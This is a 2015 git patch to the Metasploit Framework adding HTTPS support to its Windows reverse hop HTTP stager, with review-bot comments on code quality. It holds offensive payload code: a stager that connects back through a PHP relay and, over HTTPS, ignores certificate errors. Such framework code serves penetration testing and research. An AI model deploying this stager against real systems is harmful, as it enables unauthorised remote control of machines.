From 8703987535212d0dcb631731f6cfd326cd8acc78 Mon Sep 17 00:00:00 2001
From: scriptjunkie
Date: Wed, 11 Nov 2015 21:18:39 -0600
Subject: [PATCH] Add HTTPS and new transport support for hop

---
data/php/hop.php | 2 +-
lib/msf/core/handler/reverse_hop_http.rb | 23 ++++++-
lib/msf/core/payload/transport_config.rb | 4 +-
.../stagers/windows/reverse_hop_http.rb | 60 ++++++++++++++++---
4 files changed, 75 insertions(+), 14 deletions(-)

diff --git a/data/php/hop.php b/data/php/hop.php
index 948ccfe7d2..d2c289a3b5 100644
--- a/data/php/hop.php
+++ b/data/php/hop.php
@@ -45,7 +45,7 @@ if($url === "/control"){
//get data
$postdata = file_get_contents("php://input");
//See if we should send anything down
- if($postdata === "RECV\x00"){
+ if($postdata === "RECV\x00" || $postdata === "RECV"){
findSendDelete($tempdir, "down_" . sha1($url));
$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
}else{
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb
index 138a373e6c..097219cd9b 100644
--- a/lib/msf/core/handler/reverse_hop_http.rb
+++ b/lib/msf/core/handler/reverse_hop_http.rb
@@ -82,7 +82,8 @@ module ReverseHopHttp
uri.port,
{
'Msf' => framework
- }
+ },
+ full_uri.start_with?('https')
)
@running = true # So we know we can stop it
# If someone is already monitoring this hop, bump the refcount instead of starting a new thread
@@ -185,6 +186,19 @@ module ReverseHopHttp
lock.unlock
end
+ #
+ # Implemented for compatibility reasons
+ #
+ def resources
+ handlers
+ end
+
+ #
+ # Implemented for compatibility reasons, does nothing
+ #
+ def deref
+ end
+
#
# Implemented for compatibility reasons, does nothing
#
@@ -250,7 +264,7 @@ module ReverseHopHttp
#
def send_new_stage(uri)
# try to get the UUID out of the existing URI
- info = process_uri_resource(uri)
+ info = process_uri_resource(uri.to_s)
uuid = info[:uuid] || Msf::Payload::UUID.new
# generate a new connect
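Review bot: The widened poll match `$postdata === "RECV\x00" || $postdata === "RECV"` records nowhere why a second form is accepted, and the surrounding comments still read as if only the NUL-terminated poll exists, so a later cleanup could drop the bare form and silently break whichever transport sends it. Put the reason on the comparison itself, e.g. `//Accept both the original "RECV\x00" poll and the bare "RECV" sent by newer transports`. Since this control endpoint is unauthenticated and `findSendDelete` appears to hand the queued downlink to whoever posts a matching body (pre-existing, not changed here), every accepted poll form should be deliberate and documented rather than grown ad hoc.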
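Review bot: The TLS decision `full_uri.start_with?('https')` is a case-sensitive string prefix test rather than a scheme check, so if `full_uri` is the raw HOPURL a `HTTPS://hop/...` value would silently talk plaintext to a TLS hop while any scheme that merely begins with `https` would enable TLS; `URI(full_uri).scheme == 'https'` would match how the stager's `transport_config` derives the scheme from HOPURL elsewhere in this patch. The constructor this argument feeds begins outside the hunk, so the fourth positional is presumably its ssl flag; nothing visible here turns on certificate verification for the hop, which is worth stating next to the flag, e.g. `# TLS to the hop when HOPURL is https; the hop's certificate is not verified here`, if that is the intended trust model.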
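Review bot: Both new stubs carry the same bare "Implemented for compatibility reasons" header, which tells a maintainer neither which interface expects `resources`/`deref` nor why `deref` may be a no-op when this handler keeps its own hop refcount (the earlier hunk's context bumps it instead of starting a new thread). Name the consumer and the reason in the comment, e.g. `# Implemented for compatibility with the Rex HTTP server interface the HTTP handler expects; hop lifetime is governed by this module's refcount, so there is nothing to release here` — confirm which caller actually invokes these before committing the wording.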
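Review bot: `process_uri_resource(uri.to_s)` passes the whole stringified URI, yet the following hunk treats the same `uri` as a URI object (`uri.host`, `uri.port`) and hands the stage `fulluri.request_uri`; if `process_uri_resource` expects only a path, as the previous string argument suggests, `to_s` of an absolute URI would include scheme and host and the UUID lookup could miss silently, minting a fresh `Msf::Payload::UUID` for every stage. `process_uri_resource(uri.request_uri)` would be the consistent choice if that is the helper's contract; verify it before changing. `send_new_stage` continues beyond this hunk.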
@@ -258,11 +272,14 @@ module ReverseHopHttp
conn_id = generate_uri_uuid(sum, uuid)
conn_id = conn_id[1..-1] if conn_id.start_with? '/'
url = full_uri + conn_id + "/\x00"
+ fulluri = URI(full_uri + conn_id)
print_status("Preparing stage for next session #{conn_id}")
blob = stage_payload(
uuid: uuid,
- uri: conn_id
+ uri: fulluri.request_uri,
+ lhost: uri.host,
+ lport: uri.port
)
#send up
diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index 0e7d49bdc3..03820247d6 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -55,8 +55,8 @@ module Msf::Payload::TransportConfig
{
:scheme => 'http',
- :lhost => datastore['LHOST'],
- :lport => datastore['LPORT'].to_i,
+ :lhost => opts[:lhost] || datastore['LHOST'],
+ :lport => opts[:lport] || datastore['LPORT'].to_i,
:uri => uri,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb
index 138785a4da..229d85f518 100644
--- a/modules/payloads/stagers/windows/reverse_hop_http.rb
+++ b/modules/payloads/stagers/windows/reverse_hop_http.rb
@@ -16,13 +16,14 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
- 'Name' => 'Reverse Hop HTTP Stager',
+ 'Name' => 'Reverse Hop HTTP/HTTPS Stager',
'Description' => %q{
- Tunnel communication over an HTTP hop point. Note that you must first upload
+ Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
data/hop/hop.php to the PHP server you wish to use as a hop.
},
'Author' => [
'scriptjunkie ',
+ 'bannedit',
'hdm'
],
'License' => MSF_LICENSE,
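Review bot: The stage's connect-back host and port come from `uri.host`/`uri.port` while its request path comes from `fulluri`, which is built from `full_uri` (the hop URL); if the incoming `uri` can ever differ from the hop URL, the stage is told to connect to one host with a path minted for another. Deriving all three from the same object removes the ambiguity: `uri: fulluri.request_uri, lhost: fulluri.host, lport: fulluri.port`. `URI(full_uri + conn_id)` will also raise `URI::InvalidURIError` on a HOPURL containing characters `URI()` rejects, which would surface mid-session rather than at option validation; a one-line comment noting that HOPURL is assumed already validated would at least make the assumption visible.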
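Review bot: `opts[:lport] || datastore['LPORT'].to_i` only coerces the datastore fallback, so a caller that passes a string port through `opts` leaves a String in `:lport` where the datastore path yields an Integer; `(opts[:lport] || datastore['LPORT']).to_i` keeps the field's type stable regardless of source. The new override also deserves a line in the method's documentation, e.g. `# opts[:lhost]/opts[:lport] override the datastore LHOST/LPORT (used by the hop handler to point a stage at the hop)`. The enclosing method and its `opts` parameter begin outside the hunk, so I am assuming `opts` is the method's options hash.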
@@ -48,6 +49,15 @@ module Metasploit3
false
end
+ #
+ # Generate the transport-specific configuration
+ #
+ def transport_config(opts={})
+ config = transport_config_reverse_http(opts)
+ config[:scheme] = URI(datastore['HOPURL']).scheme
+ config
+ end
+
#
# Generate the first stage
#
@@ -188,12 +198,24 @@ httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
- push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
- ;0x80000000 | ; INTERNET_FLAG_RELOAD
- ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
- ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
- ;0x00000200 | ; INTERNET_FLAG_NO_UI
- ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
+EOS
+
+ if uri.scheme == 'http'
+ payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+ else
+ payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
+ end
+ # 0x80000000 | ; INTERNET_FLAG_RELOAD
+ # 0x00800000 | ; INTERNET_FLAG_SECURE
+ # 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+ # 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+ # 0x80000000 | ; INTERNET_FLAG_RELOAD
+ # 0x04000000 | ; INTERNET_NO_CACHE_WRITE
+ # 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
+ # 0x00000200 | ; INTERNET_FLAG_NO_UI
+ # 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
+ payload_data << <
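Review bot: `config[:scheme] = URI(datastore['HOPURL']).scheme` accepts whatever the parser returns — `nil` for a HOPURL with no scheme, or `ftp` — and the dwFlags selection later in this file takes the HTTPS branch (`INTERNET_FLAG_SECURE`) for anything that is not exactly `'http'`, so a bad HOPURL silently yields a TLS stager rather than an error; validate here, e.g. `raise ArgumentError, "HOPURL must be http:// or https://" unless %w[http https].include?(config[:scheme])`. `URI()` also raises `URI::InvalidURIError` on malformed input, which will surface as an exception from transport config instead of an option-validation message unless HOPURL is checked earlier (not visible in this patch). Because the HTTPS branch below sets `INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID`, the method comment should say so, e.g. `# Scheme comes from HOPURL; https builds a stager that does not validate the hop's certificate name or expiry`.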